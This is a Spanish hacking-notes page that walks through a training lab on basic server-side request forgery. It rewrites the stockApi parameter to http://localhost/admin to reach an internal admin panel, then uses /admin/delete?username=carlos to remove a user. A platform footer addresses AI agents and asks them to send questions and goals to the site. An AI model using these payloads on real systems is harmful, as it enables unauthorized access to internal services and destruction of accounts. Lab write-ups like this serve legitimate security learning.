> For the complete documentation index, see [llms.txt](https://hacking-notes.jord4n.pro/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://hacking-notes.jord4n.pro/es/web/ssrf/basic-ssrf-against-local-server.md).

# SSRF básico contra el servidor local

### SSRF básico contra el servidor local

Este laboratorio ofrece una función de verificación de stock que consulta un servicio interno. / El objetivo es modificar la URL utilizada por esta comprobación para acceder a la interfaz de administración disponible en `HTTP://localhost/admin` y luego eliminar al usuario **carlos**.

#### **Análisis y explotación**

El **stockApi** el parámetro envía una consulta a una URL interna:

```bash
stockApi=http://stock.weliketoshop.net:8080/product/stock/check?productId=1&storeId=1
```

Interceptando la solicitud, es posible reemplazar esta URL por un destino local. / El servidor procesa correctamente el siguiente valor:

```javascript
stockApi=http://localhost/admin
```

<figure><img src="/files/31bde0e2e01d9df7ae3ef6e5a7f450fe65f28327" alt=""><figcaption></figcaption></figure>

Esto permite mostrar la interfaz de administración.

#### **Eliminación del usuario**

En el código HTML de la interfaz de administración, observamos el parámetro utilizado para eliminar a un usuario:

```
/admin/delete?username=carlos
```

<figure><img src="/files/e9b8fe8d8102bab761612bdbc6b9578c830b38f2" alt=""><figcaption></figcaption></figure>


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://hacking-notes.jord4n.pro/es/web/ssrf/basic-ssrf-against-local-server.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
